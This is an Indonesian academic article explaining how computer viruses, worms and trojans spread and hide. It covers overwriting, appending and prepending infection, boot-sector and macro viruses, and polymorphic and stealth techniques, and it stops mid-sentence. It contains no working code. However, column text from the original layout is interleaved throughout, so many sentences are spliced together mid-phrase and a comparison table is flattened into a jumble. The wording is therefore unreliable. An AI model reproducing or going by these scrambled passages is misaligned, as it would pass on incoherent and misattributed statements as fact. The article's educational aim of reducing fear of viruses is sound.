15 Analisis Cara Kerja Sistem Infeksi Virus Komputer Petrus Dwi Ananto P., SKom., MMSI. I. ABSTRAKSI Virus komputer disebut sebagai virus karena mempunyai kemiripan dengan perilaku virus yang sesungguhnya di jagad biologi, terutama cara penyebarannya dari satu komputer ke komputer lain. Virus komputer, harus menumpang pada sebuah program atau dokumen supaya dapat tereksekusi. Jika program atau dokumen ini dijalankan, maka virus sudah “dibukakan jalan” untuk mengeinfeksi program atau dokumen lain. Hal ini serupa dengan virus dalam jagad biologi yang harus menumpang pada sel makhluk hidup lain guna kelangsungan hidupnya. Dan dalam aksi menumpangnya ini, virus sekaligus juga membuat induk semangnya menjadi sakit. Setiap virus komputer mempunyai beberapa rutin tertentu untuk menjamin kelangsungan hidupnya. Secara umum, ada tiga rutin yang menjadi komponen dasar pembentuk virus, yaitu rutin pencari, pengganda dan anti deteksi. Setiap rutin tersebut mempunyai tugas dan fungsi masing-masing yang saling mendukung satu dengan lainnya. Sebuah virus komputer memerlukan daftar nama-nama file yang ada dalam suatu direktori untuk mengenali file yang menjadi targetnya.Kemudian dengan kemampuan replikasi (menggandakan diri), baik dengan menimpa di atasnya (overwrite) atau menambahkan (appending) kode programnya ke program induk (host) akan ikut tereksekusi bersamaan dengan eksekusi program induknya. User biasanya tidak menyadari adanya aktivitas virus saat virus menggandakan diri dan hanya menyadari saat virus melakukan aksinya. Kata kunci : virus, virus komputer, program, user II. PENDAHULUAN dan dengan internet pula kita bisa berkomunikasi dengan semua orang yang ada di seluruh dunia 1.1. Identifikasi Masalah (peranan internet sebagai jaringan komunikasi Dewasa ini, perkembangan teknologi telah dunia). Tapi sayang, internet tidak selalu berisi membuat banyak perubahan-perubahan penting informasi-informasi yang kita inginkan. Internet juga dalam berisi kehidupan manusia sehari-hari. Salah malware atau program komputer yang satunya adalah perkembangan teknologi komputer cenderung merusak, seperti virus-virus komputer, dan internet yang membuat orang semakin mudah yang dapat membahayakan sistem operasi yang untuk mendapatkan informasi yang diinginkan. ada di komputer kita. Cukup banyak orang yang Dengan hanya berpakaian kaos dan celana pendek memiliki persepsi yang salah mengenai virus sambil minum teh atau kopi dan makan gorengan, komputer kita bisa mendapatkan informasi secara detail menjadi ketakutan secara berlebihan terhadap virus mengenai berita-berita internasional. komputer. Internet merupakan salah satu media yang paling digemari setiap orang sehingga tidak Sebagian jarang besar dari dari mereka mereka beranggapan bahwa jika komputer mereka sudah untuk mendapatkan terinfeksi virus komputer maka komputer mereka informasi yang dibutuhkan. Hampir semua informasi sudah “divonis” rusak dan semua data yang bisa kita dapatkan di internet (peranan internet tersimpan dalam komputer tersebut akan hilang dan sebagai perpustakaan terlengkap di seluruh dunia) tidak bisa “terselamatkan” lagi. 16 yang 1.2. Identifikasi Masalah terus bermunculan seiring dengan perkembangan internet itu sendiri. Berdasarkan dari uraian di atas, ada Menurut Palani Murugappan, internet beberapa masalah yang dapat diidentifikasi, antara didefinisikan sebagai berikut : lain : Internet 1. Bagaimana virus komputer bisa menjadi hal jaringan yang dihubungkan oleh kabel dan siap yang begitu menakutkan bagi para pengguna terhubung dengan satelit, dimana hampir semua komputer ? jaringan tersebut secara instan terhubung satu 2. Bagaimana peranan internet dalam penyebaran virus komputer ? adalah sebuah jaringan dari banyak dengan yang lain. Internet tidak mempunyai batas, berkembang secara eksponensial dan merupakan 3. Apa yang dapat dilakukan untuk memperkecil jaringan komputer terbesar di dunia. kemungkinan terinfeksi virus komputer ? Sedangkan Ahmad Bustami mengatakan 1.3. Tujuan Analisis bahwa Internet merupakan jaringan global yang Adapun tujuan dari analisis ini adalah untuk mengetahui seberapa jauh dari ratusan bahkan ribuan komputer dapat termasuk jaringan-jaringan lokal tersebut. Komputer- dan komputer ini terhubung menjadi satu melalui saluran yang telepon. Dilihat dari sisi teknis, internet bisa berlebihan terhadap virus komputer yang banyak didefinisikan sebagai rajanya jaringan (networks of tersebar melalui internet. networks). membahayakan pengoperasian mampu mengurangi untuk virus terdiri komputer ketakutan Sedangkan dari sisi pengetahuan, internet merupakan sebuah perpustakaan besar III. TINJAUAN PUSTAKA dengan segudang informasi-informasi lengkap, bahkan internet bisa juga didefinisikan sebagai 2.1. Internet Internet mulai komersial dan berkembang shopping center terbesar di seluruh dunia bagi orang-orang yang suka berbelanja. (1999) sangat pesat sejak tahun 1990. Sebelumnya, internet sudah dikenal di kalangan akademik dan 2.2. Trojan Horse pusat-pusat penelitian. Tapi sekarang, semua orang Virus dan worm adalah ancaman terbesar telah mengenal internet. Internet sebagai jaringan bagi dunia bisnis, dalam kaitannya dengan kerugian komputer global telah terbukti dapat mempermudah uang dan data yang diakibatkannya, sedangkan pemakainya, baik dalam berkomunikasi maupun Trojan adalah ancaman terbesar bagi sistem dalam pertukaran informasi. Banyak fasilitas yang keamanan. Adapun, virus bekerja merusak data ditawarkan oleh internet, antara lain e-mail atau sedangkan trojan mengumpulkan data yang ada electronic mail (untuk berkirim dan menerima surat dalam komputer korbannya. Virus memerlukan secara elektronik), FTP atau File Transfer Protocol banyak instruksi dan bekerja melakukan semua (untuk melakukan transfer data atau file dari satu instruksi yang telah diprogramkan dalam dirinya. komputer ke komputer lain), Web (untuk mengakses Sebaliknya, informasi-informasi), dan fasilitas-fasilitas lainnya instruksi, hanya untuk membuka backdoor komputer trojan korban. Setelah hanya backdoor memerlukan sedikit ini terbuka, berarti 17 komputer korban, secara otomatis, akan menjadi milik dari pengirim trojan tersebut. Trojan-server terbuka dalam membuat komputer beberapa target. Port port dapat Kata trojan berasal dari legenda masyarakat diasumsikan sebagai pintu. Saat pintu telah terbuka Yunani. Dalam legenda ini diceritakan bahwa ada lebar, maka orang lain dapat bebas keluar-masuk. satu pasukan yang menyerbu kota Troy yang Demikian pula halnya dengan komputer target. Saat dikelilingi oleh sebuah tembok besar, tinggi dan trojan-server telah membuka port dalam komputer susah untuk ditembus. Berbagai usaha dilakukan target, maka orang lain dapat bebas keluar-masuk, untuk menembus tembok besar tersebut, tapi selalu tanpa sepengetahuan user komputer target. Sekali gagal total. Akhirnya dilakukan perubahan taktik dan saja trojan-server telah membuka port, maka port disiapkan siasat baru, yaitu dengan membuat tersebut selamanya tidak akan pernah ditutup oleh sebuah kuda kayu yang besar dan diisi dengan trojan sehingga orang lain memiliki banyak waktu pasukan untuk terbaik. ditempatkan di Kuda luar kayu gerbang ini kemudian sebagai mengendalikan komputer target dan tanda mengetahui segala aktivitasnya. Trojan-server dan penawaran perdamaian. Trojan (penduduk kota trojan-client dapat diasumsikan sebagai televisi dan Troy) merasa senang mendapat hadiah tersebut remote control-nya. Saat televisi telah dinyalakan, dan membawanya masuk tanpa curiga sedikitpun. maka orang dapat dengan laluasa mengganti-ganti Saat malam tiba, pasukan terbaik yang sejak siang program acara melalui tombol-tombol yang ada berada dalam kuda kayu tersebut, kemudian keluar dalam remote control. dan menyerang penjaga pintu gerbang agar dapat membuka pintu gerbang sehingga pasukan yang berada di luar dapat masuk dan 2.3. Worm kemudian Banyak artikel yang menterjemahkan istilah menyerang dari dalam. Akhirnya, kota Troy dapat worm sebagai cacing. Makhluk yang satu ini dikuasai. memang tepat disebut sebagai cacing. Makhluk Seth Fogie dan Cyrus Peikari dalam buku hidup yang disebut cacing ini memiliki beberapa Windows Internet Security : Protecting Your Critical kelebihan, Data, komputer dengan bebas, hidup dengan memakan makanan merupakan sebuah program yang berisi malicious yang tersedia di sekitarnya, dan yang paling utama code yang bersembunyi pada program lain.” (2002: dan khas, adalah berkembang biak dengan cara 224) segmentasi. menerangkan bahwa “Trojan Setiap trojan bekerja sebagai client-server. Trojan-server diinstal pada komputer target diantaranya Dengan adalah cara dapat bergerak segmentasi inilah perkembangbiakan cacing menjadi sangat pesat dibandingkan makhluk hidup lainnya. sedangkan trojan-client diinstal pada komputer Menurut Seth Fogie dan Cyrus Peikari, orang yang akan mengendalikan komputer target. WORM Orang tersebut menggunakan program trojan-client sebagai berikut : Worm adalah sebuah program untuk melakukan koneksi dengan komputer target. yang dapat berjalan sendiri dan akan menggunakan Saat dalam sumber daya yang ada dalam program induk untuk komputer target, orang tersebut dapat leluasa bertahan hidup (menyebabkan daya hidup worm keluar-masuk melalui backdoor yang terbuka. lebih trojan telah membuka backdoor (Write-Once lama daripada Read-Many) virus) didefinisikan sehingga dapat 18 menyebar luas ke komputer lain tanpa adanya campur tangan manusia. (2002: 222) Tidak diragukan lagi bahwa worm memang memiliki kelebihan-kelebihan yang juga dimiliki oleh cacing. Fleksibel dalam bergerak, dapat bertahan Worm dapat menyebarkan dirinya sendiri hidup lebih lama, dan dapat mereplikasi dirinya kepada komputer-komputer berbeda yang berada sendiri sehingga menyebabkan banyak masalah dalam suatu jaringan. Worm dapat menemukan dalam jaringan. Komunikasi dalam jaringan menjadi jalan menuju komputer lain dengan menggunakan suatu sumber daya dari komputer induk. Dengan kata lain, berkembang dan menyebar dari satu komputer ke jika komputer seseorang terhubung melalui jaringan komputer lain. Karena itulah, penyebaran worm komputer menjadi lebih cepat, apalagi didukung oleh adanya lain, maka worm dapat mendekati jalan komputer itu dan secara otomatis mereplikasi komunikasi dirinya komputer sendiri, tanpa sepengetahuan orang tersebut. tol bagi jaringan. yang worm yang Jadi, berusaha semakin terhubung dengan banyak jaringan, kemungkinan, semakin banyak komputer yang Worm mirip dengan virus, yaitu dapat dapat terinfeksi oleh worm. menghapus dan memodifikasi file. Bedanya, worm memiliki tingkat penyebaran yang lebih cepat 2.4. Virus daripada virus sehingga menjadi lebih berbahaya Serangan virus komputer akhir-akhir ini daripada virus. Sebagai contoh adalah Worm terlihat Morris. Worm ini dibuat pada tanggal 2 November menggunakan 1988 oleh seorang mahasiswa berumur 23 tahun mengecoh antivirus yang ada dalam komputer user. dari suatu universitas. Beberapa saat setelah worm Selain itu, mulai terdapat indikasi penyebaran virus ini masuk ke dalam jaringan komputer yang ada di untuk universitas tersebut langsung mereplikasi dirinya sebenarnya telah muncul sejak era 1980-an. Tetapi sendiri password tingkat penyebaran yang semakin cepat dan luas komputer tersebut. Setelah sukses masuk ke dalam terjadi di awal 1990-an, yaitu ketika internet mulai komputer tersebut dan menginfeksinya, kemudian dimasyarakatkan. Dengan menumpang di dalam isi worm ini akan meng-crack password komputer lain e-mail ataupun situs web, virus semakin leluasa yang terhubung dengan komputer tersebut dan mengobrak-abrik jaringan komputer. untuk kemudian meng-crack semakin gencar. berbagai kepentingan Para trik pembuatnya supaya komersial. Program mampu virus selanjutnya menginfeksinya. Begitulah seterusnya kegiatan crack password dan infeksi berlangsung 2.4.1. Definisi Virus Komputer terus sampai seluruh komputer yang ada dalam Makhluk ini disebut sebagai virus karena jaringan tersebut terinfeksi worm ini, tanpa dapat mempunyai kemiripan dengan perilaku virus yang diketahui aktivitasnya. Meskipun Worm Morris tidak sesungguhnya di jagad biologi, terutama cara berisi tapi penyebarannya dari satu komputer ke komputer memang lain. Virus komputer, harus menumpang pada dipergunakan untuk aktivitas ribuan mahasiswa, sebuah program atau dokumen supaya dapat menjadi tidak berfungsi dan diperkirakan kerugian tereksekusi. yang diderita universitas tersebut mencapai $ dijalankan, maka virus sudah “dibukakan jalan” 100.000 sampai $10.000.000. untuk mengeinfeksi program atau dokumen lain. Hal kode-kode akibatnya semua yang dapat komputer merusak, yang Jika program atau dokumen ini 19 ini serupa dengan virus dalam jagad biologi yang Virus komputer adalah program yang menulari harus menumpang pada sel makhluk hidup lain program guna kelangsungan hidupnya. Dan dalam aksi memodifikasi mereka sedemikian rupa sehingga menumpangnya ini, virus sekaligus juga membuat sebuah salinan dari virus ini dapat tercipta. induk semangnya menjadi sakit. (Pamela Kane, 1995: 5) Tabel 2.1. Perbandingan Antara Virus Biologi dan Virus Komputer komputer lain dengan cara Virus komputer adalah serangkaian instruksi komputer yang menumpang pada program resmi atau mengganti instruksi program resmi Ciri Ukuran Komposisi Infeksi Siklus hidup Penyebar an Musuh utama Akibat Reproduk si Antideteks i Virus Biologi Virus Komputer 100 – 300 nm Berisi protein Sel makhluk hidup 20 – 45 menit 1024 byte – 5 KB Berisi malicious code File, program Hampir sama dengan proses instalasi software aplikasi Butuh intervensi manusia Butuh intervensi makhluk hidup Antibodi Menimbulk an penyakit dan Antivirus kerusakan Memanipul sel asi sistem Dengan dan menciptaka berpotensi n kode untuk genetik merusak Dengan Evolusi melakukan bentuk dan replikasi kemampua kode n programnya Polymorphi c, enkripsi, antidebugging, stealth untuk kemudian membuat salinannya ke dalam program resmi tersebut. (Ibid.: 7) Virus komputer adalah sebuah program yang melakukan duplikasi dirinya sendiri di dalam sistem komputer yang dimasukinya dan memiliki potensi yang besar untuk melakukan manipulasi terhadap Virus komputer adalah sebuah kode komputer yang dapat dijalankan dan berukuran kecil dengan kemampuan memperbanyak diri, baik dengan cara menempelkan sebagian atau seluruh sebuah seminar yang atau aplikasi program, dan tidak diinginkan. (www.bintek.depkeu.go.id) Virus komputer adalah sebuah program yang mereproduksi kodenya sendiri ke dalam file eksekusi lain, tanpa sepengetahuan dari user, sedemikian rupa sehingga kode virus tersebut akan tereksekusi saat eksekusi file yang telah terinfeksi tersebut. (www.bintek.depkeu.go.id) Virus komputer diartikan sebagai suatu program yang menginfeksi suatu file dan dapat secara otomatis menyisipkan salinan dirinya sendiri file atau komputer lain. (http://freehost16.websamba.com/pondokpelangi/) mengenai “Computer Security”, bulan Nopember 1983. Hingga file mengakibatkan komputer melakukan hal-hal Julukan “virus” sendiri diberikan oleh Len dalam tersebut. (www.bintek.depkeu.go.id) kepada Adleman, sistem Virus komputer adalah suatu program komputer saat ini, virus komputer memiliki banyak definisi, yang menyebar dari satu sistem ke sistem yang antara lain : lain dan akhirnya membuat fungsi komputer 20 tersebut tidak dapat didesain lagi. Setiap kode virus hasil salinan tanpa Secara tidak langsung, para pembuat virus bergantung pada virus aslinya. (David Frost, Ian menganut pepatah yang mengatakan “Small is Beagle, Chris Frost, 1991: 3) beautiful” sehingga ukuran virus dibuat sekecil Virus komputer adalah sebuah program yang mungkin. memasukkan dirinya sendiri ke dalam satu atau dibandingkan dengan kebanyakan program sistem lebih file dan kemudian menjalankan beberapa komputer. Sebenarnya ukuran virus yang kecil ini kegiatan. (Matt Bishop, 2003: 616) bukan hanya sekedar untuk keindahan, tapi justru Virus komputer adalah sebuah program yang untuk menghindari kecurigaan user terhadap infeksi dapat melakukan replikasi, berkembang biak virus. dan melakukan infeksi dari satu program ke menyadari jika ukuran file mereka mengalami sedikit program lain, user ke user, komputer ke penambahan (hanya beberapa byte saja). Selain itu, komputer, dan jaringan ke jaringan. (Frederick ukuran yang kecil membuat virus cepat untuk di- B. Cohen, 1994: 28) copy ke file/program lain. Proses copy yang cepat VIRUS (Vital Information Resources Under membuat proses kerja program yang lain menjadi Siege) tidak terganggu. adalah mampu program bekerja 2.4.2.1. Ukuran yang melakukan Ukuran Kebanyakan virus sangatlah user tidak kecil akan bila pernah replikasi dirinya sendiri dengan menginfeksi Dari semua bahasa pemrograman yang program lain. (Peter Norton & Paul Nielsen, ada, Assembler merupakan bahasa pemrograman 1992: 11) yang handal dan paling baik digunakan untuk Dari beberapa definisi virus di atas, ada dua membuat virus dengan ukuran yang kecil. Biasanya kata kunci mengenai definisi dari virus komputer, virus dinamai menyertakan besar penambahan yaitu program dan replikasi. Dari kedua kata kunci ukurannya, misalnya virus Die Hard 4000 (artinya itu, virus komputer dapat didefinisikan sebagai virus Die Hard akan menambah ukuran file yang sebuah program berukuran kecil yang memiliki diinfeksi dengan besar 4000 byte). kemampuan replikasi (menggandakan diri), baik dengan menimpa di atasnya (overwrite) atau 2.4.2.2. Metode Infeksi menambahkan (appending) kode programnya ke Ciri utama dari sebuah virus adalah program induk (host) dan akan ikut tereksekusi kemampuannya dalam mereplikasi dirinya sendiri ke bersamaan dengan eksekusi program induknya. dalam file/program lain. Replikasi ini dilakukan User biasanya tidak menyadari adanya aktivitas dengan virus saat virus menggandakan diri dan hanya file/program lain yang akan dijadikan sebagai menyadari saat virus melakukan aksinya. file/program induk (host). Ada banyak cara yang cara melakukan infeksi ke dalam dilakukan oleh virus dalam menginfeksi program induk, antara lain overwriting, appending, dan 2.4.2. Karakteristik Virus Komputer prepending. Setiap virus memiliki karakteristik tersendiri. Berikut ini adalah karakter-karakter virus yang membedakan virus yang satu dengan yang lainnya, yaitu ukuran, metode infeksi, dan TSR. A. Overwriting Metode ini merupakan metode yang sudah kuno, tapi memiliki daya rusak yang cukup besar 21 karena mengganti sebagian isi dari program yang ukuran file yang terinfeksi menjadi tambah besar. diinfeksi oleh virus. Virus akan meng-copy tubuhnya Saat program terinfeksi virus dijalankan, kode virus ke program induk, sehingga program induk yang akan tereksekusi terlebih dahulu kemudian diikuti terinfeksi Akibatnya dengan program induk. Program antivirus akan lebih program ini tidak dapat berjalan dengan baik, mudah mengembalikan program yang terinfeksi bahkan tidak bisa lagi dikembalikan ke kondisi virus yang menggunakan metode ini. Hapus bagian semula oleh program antivirus. Dengan metode ini awal program yang berisi virus dan setelah itu ukuran file yang terinfeksi tidak berubah. program akan kembali seperti semula. tersebut menjadi rusak. Sebelum Sebelum infeksi Sesudah infeksi Sesudah infeksi infeksi Program induk Virus Program induk Virus Gambar 2.2. Metode Infeksi Dengan Prepending Gambar 2.1. Metode Infeksi Dengan Overwritting B. Appending Ini merupakan metode penginfeksian yang 2.4.2.3. TSR (Terminate and Stay Resident) lebih maju dan sedikit “baik hati” dengan tidak TSR (Terminate and Stay Resident) adalah mengganti isi dari program yang akan diinfeksi oleh program komputer yang tinggal di memori komputer virus. Virus meng-copy tubuhnya dengan cara dan akan tetap ada sampai komputer dimatikan.. menambahi tidak Program ini meliputi utility pop-up, software jaringan, kecil dan sebagian besar virus komputer. Jika program program virus berada di awal program induk dan tersebut adalah virus komputer, maka lebih baik menggeser sedikit ke belakang program induk. lakukan booting panas (Ctrl-Alt-Del) agar virus yang Karena tidak mengubah isi dari program yang berdiam di memori menjadi hilang. dengan program meniban induk (appending) (overwriting). Sebagian terinfeksi, maka program yang terinfeksi tersebut tetap dapat berjalan normal, tetapi ukuran file menjadi bertambah besar. Dengan metode ini, kemungkinan program antivirus masih 2.4.3. Tanda-Tanda Keberadaan Virus Komputer bisa Ada banyak cara untuk mendeteksi keberadaan mengembalikan program yang terinfeksi ke kondisi virus pada sistem komputer, diantaranya adalah semula, ketika program masih bersih dari virus. sebagai berikut : 1. Program tidak berjalan secara normal, diikuti Sebelum infeksi Sesudah infeksiProgram induk pesan-pesan Virus Gambar 2.2. Metode Infeksi Dengan Appending C. Prepending Metode penginfeksian error, atau sesekali disertai animasi (walaupun menarik). 2. Berubahnya volume disk. 3. File / program yang hilang secara misterius. ini mirip dengan appending, hanya saja virus meng-copy tubuhnya pada bagian awal program induk. Hal ini membuat 4. Ukuran file yang dieksekusi menjadi berubah tanpa sebab yang diketahui. 5. Data file berubah tanpa sebab yang diketahui. 22 6. Penurunan jumlah memori tersedia walaupun Dari semua bahasa pemrograman yang komputer tidak sedang menjalankan program ada, Assembler merupakan bahasa pemrograman komputer. yang memiliki kehandalan yang paling baik untuk 7. Akses disk tampak berlebihan walaupun untuk hal-hal yang sederhana. melalui Assembler akan menghasilkan virus dengan 8. Aktifitas sistem secara keseluruhan berjalan sangat lambat dibutuhkan (untuk waktu yang digunakan dalam membuat virus. Virus yang dibuat eksekusi lebih program lama dari biasanya). ukuran yang sangat kecil (hanya beberapa byte saja) sehingga proses infeksinya menjadi lebih cepat dan mampu mengindari kecurigaan user terhadap aktifitas infeksinya. Selain itu, karena 9. Lampu disk menyala tanpa adanya keterangan apa-apa. kedekatannya dengan bahasa mesin, maka pembuat virus akan lebih mudah melakukan hampir seluruh manipulasi yang mana hal ini tidak selalu 2.4.4. Jenis-Jenis Virus Komputer Ternyata virus yang banyak dapat dilakukan oleh virus jenis lain, terutama dalam beredar hal manipulasi interupsi-interupsi memiliki jenis yang berbeda-beda. Berikut ini akan berhubungan langsung dibahas jenis-jenis virus menurut taknik pembuatan, hardware sistem komputer. dengan DOS, yang software dan infeksi yang dilakukan, dan teknik antideteksi. B. Virus Macro 2.4.4.1. Berdasarkan Teknik Pembuatan Dilihat dari teknik pembuatannya, ada tiga Salah satu jenis virus yang banyak beredar adalah virus macro. Macro adalah sebuah tool jenis virus yang dapat didefinisikan, yaitu virus yang perintah yang membutuhkan sebuah program dibuat dengan compiler, virus macro, dan virus interpretasi untuk eksekusi. Hampir semua macro, script. yang banyak dikenal, digunakan dalam produkproduk Microsoft Office. Pembuat virus macro A. Virus yang Dibuat dengan Compiler Compiler berfungsi untuk mengubah suatu memanfaatkan bahasa pemrograman yang ada dalam Microsoft Office, yaitu Visual Basic for kode bahasa pemrograman tertentu menjadi format Application (VBA). VBA merupakan .EXE dan .COM. Dengan format ini, suatu file dapat mudah digunakan, karena VBA dapat membantu langsung dieksekusi. Virus yang pertama kali user muncul di dunia komputer adalah virus yang dibuat Microsoft Office. Sebagai contoh, VBA dapat dengan compiler. Bahkan sampai sekarang pun digunakan untuk membuat program template, yang virus jenis ini berkembang dengan pesat. menyediakan user dengan format-format dokumen Virus dapat dibuat dengan berbagai macam dalam melakukan aktivitasnya tool yang dengan yang siap pakai. Tapi saat sebuah virus telah bahasa pemrograman, seperti Assembler, Pascal, memanfaatkan fasilitas VBA, maka bahaya C++, dan sebagainya. Agar virus yang telah dibuat kerusakan mulai mengancam. Salah satu virus ini dapat langsung dieksekusi, maka perlu dilakukan macro yang pernah membuat heboh adalah virus compile terlebih dahulu. TASM atau MASM adalah Melissa. Virus ini memanfaatkan Outlook (produk compiler Assembler, Turbo Pascal untuk Pascal, Microsoft yang bisa berhubungan dengan Microsoft dan Borland C++ untuk C++. Office). Virus ini melakukan reproduksi sendiri dan 23 mampu menyebar dengan cara mengirimkan dirinya menginfeksi. Apabila pada boot sector terdapat sendiri melalui address book e-mail kepada user suatu program yang mampu menyebarkan diri dan lain. Si penerima e-mail tidak akan curiga kepada si mampu tinggal di memory selama komputer bekerja, pengirim e-mail (karena pengirim memang telah maka program tersebut dapat disebut virus. dikenal) dan kemudian membukanya sehingga ia Virus ini biasanya menginfeksi boot sector menjadi terinfeksi. Aktivitas ini terus berlangsung harddisk atau floppy disk dan kemudian melakukan sampai semua nama yang terdapat dalam address loading book e-mail si pengirim akan terkirimkan semua. dinyalakan. Virus boot sector dapat meng-copy Akibatnya, jalur e-mail menjadi sibuk bahkan server dirinya sendiri dari disk ke disk, biasanya dari floppy e-mail menjadi down. disk ke harddisk kemudian kembali lagi ke floppy ke memori sesaat setelah komputer disk. Brain adalah contoh virus boot sector pertama C. Virus Script yang menyerang komputer. Virus script biasanya sering didapat dari Tempat terbaik bagi virus untuk internetkarena kelebihannya yang fleksibel dan bisa menduplikasi diri sendiri adalah suatu tempat pada berjalan pada saat terkoneksi dengan internet. Virus harddisk yang dikenal sebagai Master Boot Record jenis ini biasanya menumpang pada fileHTML (Hype (MBR). MBR adalah bagian dari drive Text menyediakan Markup Language) yang dibuat dengan informasi sebelum yang komputer menggunakan fasilitas script seperti Javascript, melakukan start-up. Sebagai contoh, jika seseorang VBScript,maupun gabungan antara script yang mempunyai partisi dan drive yang berbeda-beda mengaktifkan pada komputernya, maka MBR akan memberikan program Active-X dari Microsoft Internet Explorer. informasi tentang ukuran dan struktur dari partisi Virus script berbeda dengan virus macro. dan drive yang ada. Jika virus MBR menyerang, script berbagai maka virus tersebut akan menghapus MBR. Tidak lingkungan produk. Bahasa pemrograman umum, ada lagi informasi yang diberikan mengenai ukuran seperti VBScript, dapat menjalankan rutin-rutin dan struktur dari partisi dan drive yang ada di dalam dalam Microsoft Outlook e-mail client, web-server harddisknya. Artinya, semua data yang ada di dan web-browser. Contoh virus jenis ini adalah dalam harddisk orang tersebut menjadi tidak ada, PHP.Pirus, VBS.Kalamar, HTML.Internal. karena tidak ada lagi yang dapat menunjukkan Virus dapat berjalan dalam lokasi tempat data-data tersebut berada. 2.4.4.2. Berdasarkan Infeksi yang Dilakukan Virus MBR sulit untuk dideteksi. Hal ini Jika dilihat dari infeksi yang dilakukan, maka disebabkan karena virus ini bekerja sebelum virus dapat dibedakan menjadi virus boot sector, program virus file, virus sistem, virus multi-partite, dan virus antivirus. Karena itu, ketika program antivirus mulai registry windows. memeriksa file-file yang ada di dalam komputer, lain beroperasi, termasuk program virus MBR dapat mengalihkan pemeriksaan dan A. Virus Boot Sector Virus Boot membuat diri seolah-olah merupakan program yang Sector adalah virus yang memanfaatkan gerbang hubungan antara komputer dan media penyimpan sebagai tempat untuk legal. Contoh dari virus jenis ini adalah virus WXZ (menginfeksi boot record dan floppy disk), virus V- 24 sign (menginfeksi MBR) dan virus Stoned E. Virus Registry Windows (menginfeksi MBR dan floppy disk). Virus ini menginfeksi sistem operasiyang menggunakan B. Virus File Windows 95/98/NT danbiasanya akan melakukan infeksi dan manipulasi pada bagian Virus filemerupakan memanfaatkan suatu virus fileyang dapat yang diproses registry Windows,sebab registry adalah tempat menampung seluruh informasi komputer baik langsung pada editor DOS, seperti fileberekstensi hardware maupun software,sehingga setiap kali .COM, .EXE, .BAT, .OVL, .DRV dan beberapa file seseorang menjalankan Windowsmaka virus akan lainnya. Untuk menyebarkan dirinya, biasanya, virus dijalankan oleh registry tersebut. Contoh virus ini akan adalah WinREG. menempelkan dirinya di dalam file-file eksekusi sehingga virus akan ikut dieksekusi saat file tempat virus tersebut menumpang, dieksekusi. 2.4.4.3. Berdasarkan Teknik Antideteksi Biasanya juga, hasil infeksi dari virus ini dapat Untuk mempertahankan hidup, suatu virus diketahui dengan berubahnya ukuran file yang harus bisa diinfeksinya. Contoh dari virus ini banyak sekali, deteksi antara lain virus Dark Avenger, Dudley, Jerusalem, mempertahankan hidup. Semakin pandai suatu dll. virus menghindari deteksi antivirus, maka semakin besar C. Virus Sistem Virus semaksimal antivirus. waktu mungkin Apapun hidupnya. menghindari dilakukan Teknik demi antideteksi merupakan suatu teknik yang digunakan virus untuk sistem merupakan virus yang menghindari deteksi antivirus. Teknik antideteksi memanfaatkan file-fileyang dipakai untuk membuat tiap-tiap suatu adalah menghasilkan jenis virus yang berbeda-beda pula, fileIBMBIO.COM, seperti virus polymorphic, virus stealth, sparse sistem komputer. fileberekstensi .SYS, Contohnya IBMDOS.COM, atau COMMAND.COM. Contoh dari virus sistem adalah Lehigh virus adalah berbeda sehingga infector, dan virus cavity (spacefiller). (menginfeksi A. Virus Polymorphic COMMAND.COM). D. Virus Multi-Partite Virus multi-partite dapat bertindak sebagai virus boot sector maupun virus file. Virus ini mempunyai dua kemampuan, yaitu dapat masuk ke boot sector dan juga dapat masuk ke file. Kebanyakan virus modern merupakan virus jenis ini. Virus code Deciphering routine Enciphered Virus code Deciphering key Gambar 2.4. Virus Polymorphic dan Enkripsinya Selain fleksibel juga dianggap mampu bertahan Virus Polymorphic merupakan sejenis virus hidup lebih lama bila dibandingkan hanya memiliki yang mampu mengubah sifat dan karakteristiknya satu kemampuan saja, masuk ke dalam boot sector (punya berbagai macam bentuk) setiap kali ia atau file saja. Contoh virus ini adalah virus Mystic mereplikasi dirinya dan menginfeksi file-file baru yang dibuat di Indonesia, Angela, Anthrax. untuk menyamarkan dirinya supaya tidak mudah dikenali oleh software antivirus. Maksudnya adalah 25 Selain virus polymorphic yang mengalami sebagai berikut : setiap kali menginfeksi, virus ini membuat kode enkripsi yang berbeda-beda banyak peningkatan populasi perkomputeran virus memiliki fungsi yang identik. Hal ini dapat generatorpolymorphic juga tak luput dari perhatian dilakukan karena pada setiap proses enkripsi para ditambahkan rutin dan kunci untuk mendekripsikan bermunculan utiliti yang memiliki metode lebih diri. Pada setiap copy, rutin dan kunci inilah yang kompleks berbeda-beda. kode diantaranya adalah MTE 0.90 (Mutation Engine), dimasukkan ke dalam suatu program dan diacak TPE (Trident Polymorphic Engine), NED (Nuke sedemikian rupa untuk membuat variasi yang Encryption Device), dan DAME (Dark Avenger berbeda sehingga bagi antivirus, virus yang sama Mutation Engine). kata lain, blok pencipta tahun dunia meskipun pada umumnya setiap copy dari sebuah Dengan selama di virus. dalam 1993, Balakangan hal aktivasi life banyak polymorphic, bisa terdeteksi sebagai virus lain yang berbeda. Mengapa antivirus bisa bertindak demikian ? Hal ini B. Virus Stealth disebabkan karena untuk setiap jenis varian virus, Virus dengan tipe ini adalah virus residen produsen antivirus harus membuat kode spesifik yang berusaha untuk menghindari deteksi yang juga untuk bisa mendeteksinya. Sebuah program menyembunyikan kehadirannya pada file yang antivirus harus mampu memperkirakan beberapa terinfeksi. Untuk mendukung hal ini stealth virus pola signature yang mungkin terjadi (satu untuk akan setiap metode enkripsi yang memungkinkan) untuk membaca file yang terinfeksi tersebut, sehingga mengidentifikasikan satu jenis virus polymorphic ini. komputer akan mendapati informasi file yang bukan mencegat panggilan sistem yang akan Konsep tentang virus polymorphic yang bisa sebenarnya. Artinya, komputer telah dibohongi. melakukan proses enkripsi sendiri, menjadi booming Virus akan membodohi sistem komputer seolah-olah di tahun 1992. Peristiwa ini pada akhirnya bermuara segala sesuatu berjalan dengan normal, padahal dengan ditemukannya sebuah program yang bisa sudah mengaktivasi kode polymorphic pada sebuah virus membodohi atau menipu antivirus. Teknik ini adalah biasa. Program ini biasa disebut sebagai program teknik yang sudah canggih. Contoh dari virus ini Life adalah Asterik, AntiWin, Anticmos. Generator Polymorphic Code. Dengan rusak. Dengan teknik ini virus akan program ini, banyak virus yang bisa dibuat menjadi virus polymorphic dengan menambahkan beberapa C. Sparse Infector instruksi tertentu pada source code assembler. Virus yang menggunakan teknik ini Kemudahan inilah yang mengakibatkan banyaknya merupakan virus yang cukup pintar dalam melihat virus polymorphic baru bermunculan. sisi psikologis orang. Virus akan mulai menginfeksi Ledakan populasi virus polymorphic ini ditandai dengan munculnya virus setelah suatu kondisi 